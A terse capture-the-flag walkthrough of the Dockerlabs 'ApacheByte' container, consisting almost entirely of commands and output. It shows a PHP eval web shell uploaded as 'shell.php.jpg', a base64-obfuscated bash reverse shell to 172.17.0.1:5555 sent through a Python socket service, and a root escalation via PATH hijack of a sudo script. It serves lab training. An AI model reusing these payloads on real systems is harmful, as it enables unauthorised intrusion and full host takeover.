Dockerlabs-ApacheByte

[root@kali] /home/kali/ApacheByte  
❯ nmap 172.17.0.3 -sV -A -p-             

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:a6:6b:55:9c:c7:98:b3:ac:01:00:21:2f:67:9a:3e (ECDSA)
|_  256 68:bd:c1:ad:61:e1:5d:e9:2b:f8:d1:f1:7d:16:fe:4c (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Blog
|_http-server-header: Apache/2.4.58 (Ubuntu)

POST /account.php HTTP/1.1
Host: 172.17.0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://172.17.0.3
Connection: keep-alive
Referer: http://172.17.0.3/account.php
Cookie: PHPSESSID=q91irqueoc3m1hm82jofksmco6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=manager&numero=5597527595641235&new_password=123456&confirm_password=123456

[root@kali] /home/kali/ApacheByte  
❯ dirsearch -u http://172.17.0.3/ -H 'Cookie: PHPSESSID=5hjb4v5kq0o8agclt30qlst94g'

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.3/

[04:00:44] Scanning:                                                                                                                            
[04:00:45] 403 -   275B - /.php                                             
[04:00:46] 200 -    2KB - /account.php                                      
[04:00:49] 200 -    6KB - /dashboard.php                                    
[04:00:50] 200 -     0B - /db.php                                           
[04:00:51] 200 -    2KB - /index.php                                        
[04:00:51] 200 -    2KB - /index.php/login/                                 
[04:00:51] 301 -   307B - /libs  ->  http://172.17.0.3/libs/                
[04:00:52] 200 -    2KB - /login.php                                        
[04:00:52] 302 -     0B - /logout.php  ->  index.php                        
[04:00:53] 301 -   308B - /posts  ->  http://172.17.0.3/posts/              
[04:00:54] 200 -    2KB - /register.php                                     
[04:00:54] 403 -   275B - /server-status/                                   
[04:00:54] 403 -   275B - /server-status
[04:00:55] 302 -     0B - /upload.php  ->  index.php                        
[04:00:55] 301 -   310B - /uploads  ->  http://172.17.0.3/uploads/          
[04:00:55] 200 -   937B - /uploads/                                         
                                                                             
Task Completed         

POST /dashboard.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.17.0.2/dashboard.php
Content-Type: multipart/form-data; boundary=---------------------------214814890021625795424255400148
Content-Length: 380
Origin: http://172.17.0.2
Connection: keep-alive
Cookie: PHPSESSID=pthfg0f9kc8tku82pmafdssd2h
Priority: u=4

-----------------------------214814890021625795424255400148
Content-Disposition: form-data; name="ajax_upload"

1
-----------------------------214814890021625795424255400148
Content-Disposition: form-data; name="image"; filename="shell.php.jpg"
Content-Type: application/x-php

<?php eval($_POST["cmd"]);?>

-----------------------------214814890021625795424255400148--

www-data@26ec94ce92f3:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2800  1652 ?        Ss   11:01   0:00 /bin/sh -c service ssh start && service apache2 start && service juan_socket 
root          15  0.0  0.0  12020  3040 ?        Ss   11:01   0:00 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
root          33  0.0  0.2 203872 22332 ?        Ss   11:01   0:00 /usr/sbin/apache2 -k start
www-data      38  0.0  0.3 204868 29044 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      39  0.0  0.3 204604 25992 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      40  0.0  0.2 204604 20380 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      41  0.0  0.2 204664 20280 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      42  0.0  0.2 204728 19844 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
juan          51  0.0  0.1  15492 10572 ?        S    11:01   0:00 /usr/bin/python3 /home/juan/socket_server.py
mysql         81  0.0  0.0   2800  1876 ?        S    11:01   0:00 /bin/sh /usr/bin/mysqld_safe
mysql        229  0.5  5.2 2442844 426164 ?      Sl   11:01   0:07 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/li
root         295  0.0  0.0   2728  1488 ?        S    11:01   0:00 tail -f /dev/null
www-data     296  0.0  0.3 204732 25504 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data     297  0.0  0.2 204736 20860 ?        S    11:02   0:00 /usr/sbin/apache2 -k start
www-data     302  0.0  0.0   4324  3324 ?        S    11:13   0:00 bash
www-data     330  0.0  0.1  17588 12928 ?        S    11:13   0:00 /usr/bin/python3 -Wignore -c import base64,zlib;exec(zlib.decompress(base64.b
www-data     331  0.0  0.0   4972  4068 pts/0    Ss   11:13   0:00 /usr/bin/bash -i
root         411  0.0  0.0   4588  3952 pts/1    Ss+  11:22   0:00 /bin/bash
www-data     427  0.0  0.0   8284  4252 pts/0    R+   11:23   0:00 ps aux
www-data@26ec94ce92f3:/tmp$ ls -al
total 376
drwxrwxrwt 1 root     root       4096 Jun  8 11:19 .
drwxr-xr-x 1 root     root       4096 Jun  8 11:01 ..
srwxrwxrwx 1 juan     juan          0 Jun  8 11:01 dev.sock
-rwxr-xr-x 1 www-data www-data 375176 Apr 22 15:08 socat

www-data@26ec94ce92f3:/tmp$ ./socat - UNIX-CONNECT:/tmp/dev.sock
id
Executed.
www-data@26ec94ce92f3:/tmp$ ./socat - UNIX-CONNECT:/tmp/dev.sock
whoami
name 'whoami' is not defined
www-data@26ec94ce92f3:/tmp$ ./socat - UNIX-CONNECT:/tmp/dev.sock
print(123)
Executed.

import os;os.system("printf KGJhc2ggPiYgL2Rldi90Y3AvMTcyLjE3LjAuMS81NTU1IDA+JjEpICY=|base64 -d|bash");

juan@26ec94ce92f3:~$ sudo -l
Matching Defaults entries for juan on 26ec94ce92f3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User juan may run the following commands on 26ec94ce92f3:
    (alex) NOPASSWD: /bin/nano

alex@26ec94ce92f3:~$ sudo -l
Matching Defaults entries for alex on 26ec94ce92f3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User alex may run the following commands on 26ec94ce92f3:
    (ALL) NOPASSWD: /usr/local/bin/report_tool

#!/bin/bash
#
# report_tool: muestra la fecha o, si existe override, usa tu PATH local

CONF_FILE="./report_tool.conf"
if [ -r "$CONF_FILE" ]; then
    source "$CONF_FILE"
    if [ -n "$OVERRIDE_PATH" ]; then
        export PATH="$OVERRIDE_PATH:$PATH"
    fi
fi
exec date

alex@26ec94ce92f3:~$ echo -e '#!/bin/bash\n/bin/bash' > date
alex@26ec94ce92f3:~$ chmod +x date
alex@26ec94ce92f3:~$ echo 'OVERRIDE_PATH=.' > report_tool.conf
alex@26ec94ce92f3:~$ sudo /usr/local/bin/report_tool
root@26ec94ce92f3:/home/alex# id
uid=0(root) gid=0(root) groups=0(root)
root@26ec94ce92f3:/home/alex#